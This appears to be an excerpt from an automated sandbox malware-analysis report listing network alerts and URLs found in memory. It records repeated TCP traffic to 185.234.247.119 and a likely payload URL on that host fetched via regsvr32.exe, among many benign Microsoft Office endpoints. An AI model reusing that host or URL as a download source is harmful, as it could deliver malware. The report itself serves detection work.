                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: ~WRS{51D44AD9-2EC9-4592-AFD3-FEABD139B753}.tmp.0.drString found in binary or memory: http://185.234.247.119:80/123.RES
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                            Source: regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
                            Source: explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/http
                            Source: regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
                            Source: regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
                            Source: explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                            Source: regsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
                            Source: regsvr32.exe, 00000029.00000002.548914112.0000000002FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types-IWSDLPublish
                            Source: regsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesI
                            Source: explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesU
                            Source: explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
                            Source: regsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typeso
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.aadrm.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.aadrm.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.cortana.ai
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.diagnostics.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.office.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.onedrive.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://apis.live.net/v5.0/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://augloop.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://augloop.office.com/v2
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cdn.entity.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://config.edge.skype.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cortana.ai
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cortana.ai/api
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cr.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dataservice.o365filtering.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dev.cortana.ai
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://devnull.onenote.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://directory.services.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://graph.ppe.windows.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://graph.ppe.windows.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://graph.windows.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://graph.windows.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://invites.office.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://lifecycle.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://login.microsoftonline.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://login.windows.local
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://management.azure.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://management.azure.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://messaging.engagement.office.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://messaging.office.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ncus.contentsync.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ncus.pagecontentsync.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://officeapps.live.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://onedrive.live.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://onedrive.live.com/embed?
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://osi.office.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://otelrules.azureedge.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office365.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office365.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://pages.store.office.com/review/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://powerlift.acompli.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://roaming.edog.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://settings.outlook.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://shell.suite.office.com:1443
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://staging.cortana.ai
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://store.office.de/addinstemplate
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://tasks.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://web.microsoftstream.com/video/
